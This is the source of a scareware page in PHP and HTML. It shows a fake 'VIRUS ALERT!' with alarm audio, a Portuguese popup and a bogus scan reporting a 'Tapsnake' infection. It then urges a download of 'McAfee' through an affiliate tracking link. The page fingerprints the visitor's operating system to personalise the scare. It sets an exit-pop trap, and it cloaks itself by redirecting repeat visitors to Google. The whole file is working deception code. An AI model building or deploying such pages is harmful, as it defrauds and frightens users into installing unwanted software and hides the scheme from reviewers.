<?php
ob_start();
if(isset($_COOKIE['cookie'])){
$cookie = $_COOKIE['cookie'];
// Cookie inserted
header("Location: http://google.com");

die();
}
else{
$cookie_name = 'cookie';
$cookie_value = 'test_cookie';
setcookie($cookie_name, $cookie_value);



}
ob_end_flush();
?>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
VIRUS ALERT!</title>
<!-- Alert -->
<!--<script language="JavaScript" type="text/javascript">
alert("\VIRUS ALERT!!\n\nThe last website you visited may have infected your "+ +" with a virus.\n\nPress OK to begin the repair process.");
</script>-->
<!-- <script src="jquery-2.1.1.min.js" type="text/javascript"></script> -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"></script>
<script>
function getURLParameter(name) {
    return decodeURI(
        (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search)||[,null])[1] || ''
    );
}
</script>
<script type="text/javascript">
$(document).ready(function()
{
    window.scrollTo(0, 1);
    values = [
        {"percent" : "0", "text" : "Loading..."},
        {"percent" : "11", "text" : "Scanning... <strong>Folders</strong>"},
        {"percent" : "35", "text" : "Scanning... <strong>Files</strong>"},
        {"percent" : "63", "text" : "Scanning... <strong>Apps</strong>"},
        {"percent" : "81", "text" : "Scanning... <strong>Battery</strong>"},
        {"percent" : "100", "text" : "<strong>Scan Complete</strong>"}
    ];

    var i = 0;
    var intId = null;

    function updateStatusBar() {
        if (i < values.length-1) {
            i++;
            $(".progress-bar-color").css({width: parseInt(values[i].percent)+'%'});
            $('.status-percent').html(values[i].percent + '%');
            $('.status-text').html(values[i].text);
        } else {
            clearInterval(intId);
            $('.status-percent').css('visibility', 'hidden');
			$('.status-text').html('<strong>Tapsnake Virus Detected!</strong>').addClass('align').fadeOut(500).fadeIn(500).fadeOut(500).fadeIn(500).fadeOut(500, function() {
                $('.status-text').html('<strong>Searching for removal options...</strong>').addClass('searching');
                $('.status-text').fadeIn(500, function () {
                    window.setTimeout(function() {
                        $('.outer1').fadeOut(500, function() {
                            $('.outer1').remove();
                            $('.outer2').fadeIn(500);
                        });
                    }, 5000);
                });
            });

            $('.progress-bar').addClass('progress-bar-red');
        }
    }

    $('.orange').click(function () {
        $.when($('.outer0').fadeOut(500)).done(function () {
            $('.outer0').remove();
            $('.outer1').show();
            intId = setInterval(updateStatusBar,2000);
        });
    });
});

</script>
<script language="JavaScript">
/**
 * JavaScript Client Detection
 * (C) viazenetti GmbH (Christian Ludwig)
 */
(function (window) {
    {
    var unknown = '-';

    // screen
    var screenSize = '';
    if (screen.width) {
        width = (screen.width) ? screen.width : '';
        height = (screen.height) ? screen.height : '';
        screenSize += '' + width + " x " + height;
    }

    //browser
    var nVer = navigator.appVersion;
    var nAgt = navigator.userAgent;
    var browser = navigator.appName;
    var version = '' + parseFloat(navigator.appVersion);
    var majorVersion = parseInt(navigator.appVersion, 10);
    var nameOffset, verOffset, ix;

    // Opera
    if ((verOffset = nAgt.indexOf('Opera')) != -1) {
        browser = 'Opera';
        version = nAgt.substring(verOffset + 6);
        if ((verOffset = nAgt.indexOf('Version')) != -1) {
        version = nAgt.substring(verOffset + 8);
        }
    }
    // MSIE
    else if ((verOffset = nAgt.indexOf('MSIE')) != -1) {
        browser = 'Microsoft Internet Explorer';
        version = nAgt.substring(verOffset + 5);
    }
    // Chrome
    else if ((verOffset = nAgt.indexOf('Chrome')) != -1) {
        browser = 'Chrome';
        version = nAgt.substring(verOffset + 7);
    }
    // Safari
    else if ((verOffset = nAgt.indexOf('Safari')) != -1) {
        browser = 'Safari';
        version = nAgt.substring(verOffset + 7);
        if ((verOffset = nAgt.indexOf('Version')) != -1) {
        version = nAgt.substring(verOffset + 8);
        }
    }
    // Firefox
    else if ((verOffset = nAgt.indexOf('Firefox')) != -1) {
        browser = 'Firefox';
        version = nAgt.substring(verOffset + 8);
    }
    // MSIE 11+
    else if (nAgt.indexOf('Trident/') != -1) {
        browser = 'Microsoft Internet Explorer';
        version = nAgt.substring(nAgt.indexOf('rv:') + 3);
    }
    // Other browsers
    else if ((nameOffset = nAgt.lastIndexOf(' ') + 1) < (verOffset = nAgt.lastIndexOf('/'))) {
        browser = nAgt.substring(nameOffset, verOffset);
        version = nAgt.substring(verOffset + 1);
        if (browser.toLowerCase() == browser.toUpperCase()) {
        browser = navigator.appName;
        }
    }
    // trim the version string
    if ((ix = version.indexOf(';')) != -1) version = version.substring(0, ix);
    if ((ix = version.indexOf(' ')) != -1) version = version.substring(0, ix);
    if ((ix = version.indexOf(')')) != -1) version = version.substring(0, ix);

    majorVersion = parseInt('' + version, 10);
    if (isNaN(majorVersion)) {
        version = '' + parseFloat(navigator.appVersion);
        majorVersion = parseInt(navigator.appVersion, 10);
    }

    // mobile version
    var mobile = /Mobile|mini|Fennec|Android|iP(ad|od|hone)/.test(nVer);

    // cookie
    var cookieEnabled = (navigator.cookieEnabled) ? true : false;

    if (typeof navigator.cookieEnabled == 'undefined' && !cookieEnabled) {
        document.cookie = 'testcookie';
        cookieEnabled = (document.cookie.indexOf('testcookie') != -1) ? true : false;
    }

    // system
    var os = unknown;
    var clientStrings = [
        {s:'Windows 10', r:/(Windows 10.0|Windows NT 10.0)/},
        {s:'Windows 8.1', r:/(Windows 8.1|Windows NT 6.3)/},
        {s:'Windows 8', r:/(Windows 8|Windows NT 6.2)/},
        {s:'Windows 7', r:/(Windows 7|Windows NT 6.1)/},
        {s:'Windows Vista', r:/Windows NT 6.0/},
        {s:'Windows Server 2003', r:/Windows NT 5.2/},
        {s:'Windows XP', r:/(Windows NT 5.1|Windows XP)/},
        {s:'Windows 2000', r:/(Windows NT 5.0|Windows 2000)/},
        {s:'Windows ME', r:/(Win 9x 4.90|Windows ME)/},
        {s:'Windows 98', r:/(Windows 98|Win98)/},
        {s:'Windows 95', r:/(Windows 95|Win95|Windows_95)/},
        {s:'Windows NT 4.0', r:/(Windows NT 4.0|WinNT4.0|WinNT|Windows NT)/},
        {s:'Windows CE', r:/Windows CE/},
        {s:'Windows 3.11', r:/Win16/},
        {s:'Android', r:/Android/},
        {s:'Open BSD', r:/OpenBSD/},
        {s:'Sun OS', r:/SunOS/},
        {s:'Linux', r:/(Linux|X11)/},
        {s:'iOS', r:/(iPhone|iPad|iPod)/},
        {s:'Mac OS X', r:/Mac OS X/},
        {s:'Mac OS', r:/(MacPPC|MacIntel|Mac_PowerPC|Macintosh)/},
        {s:'QNX', r:/QNX/},
        {s:'UNIX', r:/UNIX/},
        {s:'BeOS', r:/BeOS/},
        {s:'OS/2', r:/OS\/2/},
        {s:'Search Bot', r:/(nuhk|Googlebot|Yammybot|Openbot|Slurp|MSNBot|Ask Jeeves\/Teoma|ia_archiver)/}
    ];
    for (var id in clientStrings) {
        var cs = clientStrings[id];
        if (cs.r.test(nAgt)) {
        os = cs.s;
        break;
        }
    }

    var osVersion = unknown;

    if (/Windows/.test(os)) {
        osVersion = /Windows (.*)/.exec(os)[1];
        os = 'Windows';
    }

    switch (os) {
        case 'Mac OS X':
        osVersion = /Mac OS X (10[\.\_\d]+)/.exec(nAgt)[1];
        break;

        case 'Android':
        osVersion = /Android ([\.\_\d]+)/.exec(nAgt)[1];
        break;

        case 'iOS':
        osVersion = /OS (\d+)_(\d+)_?(\d+)?/.exec(nVer);
        osVersion = osVersion[1] + '.' + osVersion[2] + '.' + (osVersion[3] | 0);
        break;
    }

    var flashVersion = 'no check', d, fv = [];
    if (typeof navigator.plugins !== 'undefined' && typeof navigator.plugins["Shockwave Flash"] === "object") {
        d = navigator.plugins["Shockwave Flash"].description;
        if (d && !(typeof navigator.mimeTypes !== 'undefined' && navigator.mimeTypes["application/x-shockwave-flash"] && !navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)) { // navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin indicates whether plug-ins are enabled or disabled in Safari 3+
        d = d.replace(/^.*\s+(\S+\s+\S+$)/, "$1");
        fv[0] = parseInt(d.replace(/^(.*)\..*$/, "$1"), 10);
        fv[1] = parseInt(d.replace(/^.*\.(.*)\s.*$/, "$1"), 10);
        fv[2] = /[a-zA-Z]/.test(d) ? parseInt(d.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0;
        }
    } else if (typeof window.ActiveXObject !== 'undefined') {
        try {
        var a = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
        if (a) { // a will return null when ActiveX is disabled
            d = a.GetVariable("$version");
            if (d) {
            d = d.split(" ")[1].split(",");
            fv = [parseInt(d[0], 10), parseInt(d[1], 10), parseInt(d[2], 10)];
            }
        }
        }
        catch(e) {}
    }
    if (fv.length) {
        flashVersion = fv[0] + '.' + fv[1] + ' r' + fv[2];
    }    
    }

    window.jscd = {
    screen: screenSize,
    browser: browser,
    browserVersion: version,
    mobile: mobile,
    os: os,
    osVersion: osVersion,
    cookies: cookieEnabled,
    flashVersion: flashVersion
    };
}(this));

os =  jscd.os +' '+ jscd.osVersion;
</script>
<!-- CSS -->
<style type="text/css">body { background: #ccc; padding: 0; margin: 0; font-family: arial; }
.outer { padding: 10px; height: 100%; }
.container { -moz-border-radius: 6px; -webkit-border-radius: 6px; border-radius: 6px; width: 700px; margin: 30px auto; border: 10px solid #fff; box-shadow: 8px 8px 8px #bbb; }
.topcontent { background: #e1e1e1; color: white; }
.mainpage { font-size: 16px; padding: 10px; background: #fff; color: #333; font-weight: normal; }
.topcontent .header { font-size: 22px; font-weight: 700; text-shadow: 0 1px 0 #fff; padding: 5px 0 13px; padding-left: 10px; color: #000; border-bottom: 1px solid #FFF; }
.topcontent .header img { position: relative; top: 8px; left: 0; margin-right: 6px; }
.topcontent .inner { padding: 10px; -moz-border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; }
.bottomcontent { border-top: 1px solid #fff; background: #e1e1e1; color: #333; padding: 15px; text-align: center; -moz-border-radius: 0 0 6px 6px; }
.bottomcontent .button { background: rgb(255,255,255); background: -moz-linear-gradient(top, rgba(255,255,255,1) 0%, rgba(241,241,241,1) 50%, rgba(225,225,225,1) 51%, rgba(246,246,246,1) 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgba(255,255,255,1)), color-stop(50%, rgba(241,241,241,1)), color-stop(51%, rgba(225,225,225,1)), color-stop(100%, rgba(246,246,246,1))); background: -webkit-linear-gradient(top, rgba(255,255,255,1) 0%, rgba(241,241,241,1) 50%, rgba(225,225,225,1) 51%, rgba(246,246,246,1) 100%); background: -o-linear-gradient(top, rgba(255,255,255,1) 0%, rgba(241,241,241,1) 50%, rgba(225,225,225,1) 51%, rgba(246,246,246,1) 100%); background: -ms-linear-gradient(top, rgba(255,255,255,1) 0%, rgba(241,241,241,1) 50%, rgba(225,225,225,1) 51%, rgba(246,246,246,1) 100%); background: linear-gradient(to bottom, rgba(255,255,255,1) 0%, rgba(241,241,241,1) 50%, rgba(225,225,225,1) 51%, rgba(246,246,246,1) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#f6f6f6', GradientType=0 );
width: 200px; margin: 0 auto; border: 1px solid #666; border-radius: 4px; box-shadow: 0 1px 0 0 #FFFFFF inset; }
.bottomcontent .button a { font-family: Arial, Helvetica, sans-serif; color: #000; display: inline-block; font-size: 14px; font-weight: bold; padding: 11px 20px; text-decoration: none; text-shadow: 0; }
.bottomcontent .orange { background: #ffffff; /* Old browsers */ background: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */ background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #ffffff), color-stop(100%, #e5e5e5)); /* Chrome,Safari4+ */ background: -webkit-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* Chrome10+,Safari5.1+ */ background: -o-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* Opera 11.10+ */ background: -ms-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* IE10+ */ background: linear-gradient(to bottom, #ffffff 0%, #e5e5e5 100%); /* W3C */ filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#e5e5e5', GradientType=0 ); /* IE6-9 */
width: 200px; margin: 0 auto; border: 2px solid #fff; border-radius: 4px; box-shadow: 2px 2px 2px #ccc; }
.bottomcontent .orange a { font-family: Arial, Helvetica, sans-serif; color: #000; display: inline-block; font-size: 18px; font-weight: bold; padding: 11px 20px; text-decoration: none; text-shadow: 0; }
* { padding: 0; margin: 0; }
h1 { font-weight: normal; background: #ABD241; text-shadow: 0 1px 0 #fff; position: relative; display: block; padding: 5px 0; color: black; text-align: center; }
h1 > span { width: 290px; margin: auto; display: block; padding: 5px; font-size: 18px; line-height: 30px; text-align: center; }
h1 span .sprite { float: left; vertical-align: middle; vertical-align: middle; }
h1 span img { vertical-align: middle; position: relative; bottom: 2px; }
.wrapper { background: #eee; width: 100%; margin: auto; font-family: Arial, Helvetica, sans-serif; }
h2 { text-shadow: 0 1px 0 333; padding: 10px 0 0 10px; border-top: 1px solid #ccc; color: #333; font-size: 18px; }
h2 strong { display: block; }
h2 img, h2 .sprite { float: left; margin: 0 8px 0 0 !important; }
.progress-bar { display: block; border: 2px solid #fff; height: 50px; }
.progress-bar .progress-bar-color { background: #e1e1e1; display: block; height: 50px; line-height: 50px; width: 0%; }
.progress-bar-red { padding: 0; height: 50px; }
.progress-bar-red .progress-bar-color { top:1px;height: 50px; width: 100%; background:#fff;color:red; }
.progress { position: relative; background: #fff; color: #333; }
.progress .status-text { font-size: 15px; position: absolute; top: 1px; text-align: left; text-indent: 12px; width: 100%; height: 50px; line-height: 50px; vertical-align: middle; }
.progress .status-percent { position: absolute; top: 2px; right: 2px; font-size: 16px; background: red; color: #fff; text-shadow: 0 1px 0 red; height: 50px; line-height: 50px; width: 55px; text-align: center; font-weight: bold; }
.searching { background: #fff;color:green;height:52px;top:1px; text-align: center !important; }
.bwrap { width: 250px; margin: auto; margin-top: 15px; text-align: center; }
.bwrap .button { text-decoration: none; width: 60%; font-size: 17px; margin: 0 auto; background: #abd241 url("country/files/scan/repair.png.html") 155px 13px no-repeat; border: 1px solid #658a01; color: black; text-shadow: 0 1px 0 #fff; font-weight: bold; padding: 8px 25px 8px 8px; display: block; box-shadow: 2px 2px 0 #ccc; }
.errors { margin: 0 0 10px; border: 1px solid #ccc; padding: 2px; border-radius: 2px;background:#fff; }
.errors h3 { background: #666; padding: 10px; font-size: 14px; color: #fff; }
.errors ul { list-style: none; padding: 5px 4px; }
.errors li { border-bottom:1px dotted #e1e1e1;padding:10px 0 10px 5px;font-size: 14px; color: #333; }
.errors li img { float: left; position: relative; top: 0; margin-right: 6px; }
.remove { margin: 0; background:white;border: 1px solid #ccc; padding: 2px; border-radius: 2px; }
.remove h3 { background: #666; padding: 10px; font-size: 14px; color: #fff; }
.remove ul { list-style: none; padding: 5px 4px; }
.remove li { border-bottom:1px dotted #e1e1e1;padding:10px 0 10px 5px;font-size: 14px; color: #333; }
.remove li img { float: left; position: relative; top: 0; margin-right: 6px; }
.wrapper .inner { padding: 10px; -moz-border-radius: 0 0 6px 6px; -webkit-border-radius: 0 0 6px 6px; border-radius: 0 0 6px 6px; }
.align { text-align: center !important; }
</style>
<style type="text/css">#yddContainer{display:block;font-family:Microsoft YaHei;position:relative;width:100%;height:100%;top:-4px;left:-4px;font-size:12px;border:1px solid}#yddTop{display:block;height:22px}#yddTopBorderlr{display:block;position:static;height:17px;padding:2px 28px;line-height:17px;font-size:12px;color:#5079bb;font-weight:bold;border-style:none solid;border-width:1px}#yddTopBorderlr .ydd-sp{position:absolute;top:2px;height:0;overflow:hidden}.ydd-icon{left:5px;width:17px;padding:0px 0px 0px 0px;padding-top:17px;background-position:-16px -44px}.ydd-close{right:5px;width:16px;padding-top:16px;background-position:left -44px}#yddKeyTitle{float:left;text-decoration:none}#yddMiddle{display:block;margin-bottom:10px}.ydd-tabs{display:block;margin:5px 0;padding:0 5px;height:18px;border-bottom:1px solid}.ydd-tab{display:block;float:left;height:18px;margin:0 5px -1px 0;padding:0 4px;line-height:18px;border:1px solid;border-bottom:none}.ydd-trans-container{display:block;line-height:160%}.ydd-trans-container a{text-decoration:none;}#yddBottom{position:absolute;bottom:0;left:0;width:100%;height:22px;line-height:22px;overflow:hidden;background-position:left -22px}.ydd-padding010{padding:0 10px}#yddWrapper{color:#252525;z-index:10001;background:url(chrome-extension://eopjamdnofihpioajgfdikhhbobonhbb/ab20.png);}#yddContainer{background:#fff;border-color:#4b7598}#yddTopBorderlr{border-color:#f0f8fc}#yddWrapper .ydd-sp{background-image:url(chrome-extension://eopjamdnofihpioajgfdikhhbobonhbb/ydd-sprite.png)}#yddWrapper a,#yddWrapper a:hover,#yddWrapper a:visited{color:#50799b}#yddWrapper .ydd-tabs{color:#959595}.ydd-tabs,.ydd-tab{background:#fff;border-color:#d5e7f3}#yddBottom{color:#363636}#yddWrapper{min-width:250px;max-width:400px;}</style></head>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-79824400-14', 'auto');
  ga('send', 'pageview');

</script>
<script type="text/javascript">
setTimeout(function(){var a=document.createElement("script");
var b=document.getElementsByTagName("script")[0];
a.src=document.location.protocol+"//script.crazyegg.com/pages/scripts/0052/1676.js?"+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1);
</script>
<body>
<audio autoplay="autoplay" preload="">
	<source src="alert2.ogg" type="audio/ogg">
	<source src="alert2.mp3" type="audio/mpeg">
</audio>
<div class="outer outer0">
	<div class="container">
		<div class="topcontent">
			<div class="header" align="center" style="padding-top:18px;">
				VIRUS ALERT!			</div>
			<div class="mainpage" style="border:5px solid red;padding:20px 20px 20px 15px;border-radius:0;">
				<img src="dreq.png" width="45" style="float:left;margin-right:10px;">A website you have visited today may have infected your  <script language="javascript">document.write(os);</script> with a virus. A full system scan is now required to find and remove harmful files or applications from your device.			</div>
		</div>
		<div class="bottomcontent">
			<div class="orange"> <a href="javascript:;"><strong>
				Scan Now				</strong></a> </div>
			<div style="clear:both;"></div>
		</div>
	</div>
</div>
<div class="outer outer1" style="display:none">
	<div class="container">
		<div class="topcontent">
			<div class="header"><img width="32" src="ajax.gif" style="margin-right:9px;">
				SCAN IN PROGRESS			</div>
		</div>
		<div class="wrapper">
			<div class="inner">
				<div class="progress">
					<div class="progress-bar">
						<div class="progress-bar-color"></div>
					</div>
					<span class="status-text">
					Loading...					</span>
					<div class="status-percent">0%</div>
				</div>
			</div>
		</div>
	</div>
</div>

<div class="outer outer2" style="display:none">
	<div class="container">
		<div class="topcontent">
			<div class="header"><img src="dreq.png" width="30" style="margin-right:2px">
				DOWNLOAD REQUIRED			</div>
			<div style="padding:10px;font-size:14px;color:#fff;background:red;">
				Please download the McAfee application to remove Tapsnake from your <script language="javascript">document.write(os);</script>.			</div>
		</div>
		<div class="wrapper" style="border-radius:0;">
			<div class="inner" style="padding-top:10px;border-radius:0;">
				<div class="errors">
					<h3>
						VIRUS INFORMATION					</h3>
					<ul>
						<li style="border-top:0;padding-top:5px;"><img src="cross.png"><strong>
							Virus Name:							</strong> Tapsnake</li>
						<li><img src="cross.png"><strong>
							Risk:							</strong>
							HIGH						</li>
						<li style="border-bottom:0;margin-bottom:0;"><img src="cross.png"><strong>
							Infected File:							</strong> /<script language="javascript">document.write(os);</script>/apps/snake.icv</li>
					</ul>
				</div>
				<div class="remove">
					<h3>
						VIRUS REMOVAL					</h3>
					<ul>
						<li style="border-top:0;padding-top:5px;"><img src="tick.png"><strong>
							Application:							</strong>
							McAfee						</li>
						<li><img src="tick.png"><strong>
							Rating:							</strong>9.9/10</li>
						<!--<li style="border-bottom:0;margin-bottom:0;"><img src="tick.png"><strong>
							Price:							</strong>
							Free						</li>-->
					</ul>
				</div>
			</div>
		</div>
		<div class="bottomcontent">
			<div class="orange" style="width:300px;"> <a href="http://xolmf.voluumtrk.com/click" style="padding:11px 15px;" onClick="PreventExitPop=true" ><strong>
				REMOVE VIRUS NOW				</strong></a> </div>
			<div style="clear:both;"></div>
		</div>
	</div>
</div>
<script type="text/javascript">
  var PreventExitPop = false;
  function ExitPop() {
    if(PreventExitPop == false)	{
      PreventExitPop=true;
      return "Your Mac " + getURLParameter('osversion') + " needs a Quick Scan (takes 10 seconds)\n\nAs the virus may infect your system files and damage your hardware!";
    }
  }
</script>
<script language="JavaScript">
  window.onbeforeunload = ExitPop;
</script>

<!-- Alert -->
<script language="JavaScript" type="text/javascript">
//alert("\VIRO ENCONTRADO!\n\nO último site que você visitou infectou seu  "+os+" com um vírus.\n\nPressione OK para iniciar o processo de reparo.");
</script>

<!-- The Modal -->
<div id="myModal" class="modal">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="modal-header">
      <span class="close">&times;</span>
      
    </div>
    <div class="modal-body">
      <p> <center><b>VIRO ENCONTRADO!</b></center> <br><br>
      O último site que você visitou infectou seu  <b> <script language="javascript">document.write(os);</script> </b>
      com um vírus.<br><br>
      
      Pressione OK para iniciar o processo de reparo.</p>    
      
         <br><br>
      <center><input type="button" id="btn_ok" value="Ok" style="width:100px;"></center>  
    </div>
    <div class="modal-footer">
      
    </div>
  </div>

</div>



<style>
/* The Modal (background) */
.modal {
    display: none; /* Hidden by default */
    position: fixed; /* Stay in place */
    z-index: 1; /* Sit on top */
    padding-top: 100px; /* Location of the box */
    left: 0;
    top: 0;
    width: 100%; /* Full width */
    height: 100%; /* Full height */
    overflow: auto; /* Enable scroll if needed */
    background-color: rgb(0,0,0); /* Fallback color */
    background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
}

/* Modal Content */
.modal-content {
    position: relative;
    background-color: #fefefe;
    margin: auto;
    padding: 0;
    border: 1px solid #888;
    width: 418px;
	height: 195px;
    box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
    -webkit-animation-name: animatetop;
    -webkit-animation-duration: 0.4s;
    animation-name: animatetop;
    animation-duration: 0.4s
}

/* Add Animation */
@-webkit-keyframes animatetop {
    from {top:-300px; opacity:0} 
    to {top:0; opacity:1}
}

@keyframes animatetop {
    from {top:-300px; opacity:0}
    to {top:0; opacity:1}
}

/* The Close Button */
.close {
    color: red;
    float: right;
    font-size: 28px;
    font-weight: bold;
}

.close:hover,
.close:focus {
    color: #000;
    text-decoration: none;
    cursor: pointer;
}

.modal-header {
    padding: 2px 16px;
    background-color: #fefefe;
    color: white;
}

.modal-body {padding: 2px 16px;}

.modal-footer {
    padding: 2px 16px;
    background-color: #fefefe;
    color: white;
}
</style>


<script>
// Get the modal
var modal = document.getElementById('myModal');

// Get the button that opens the modal
var btn = document.getElementById("myBtn");

// Get the <span> element that closes the modal
var span = document.getElementsByClassName("close")[0];

// When the user clicks the button, open the modal 
//btn.onclick = function() {
    modal.style.display = "block";
//}

// When the user clicks on <span> (x), close the modal
span.onclick = function() {
    modal.style.display = "none";
}

// When the user clicks anywhere outside of the modal, close it
window.onclick = function(event) {
    if (event.target == modal) {
        modal.style.display = "none";
    }
}

$( document ).ready(function() {
  
	$("#btn_ok").click(function() {
          modal.style.display = "none";
     }); 
	 
});

</script>


</body></html>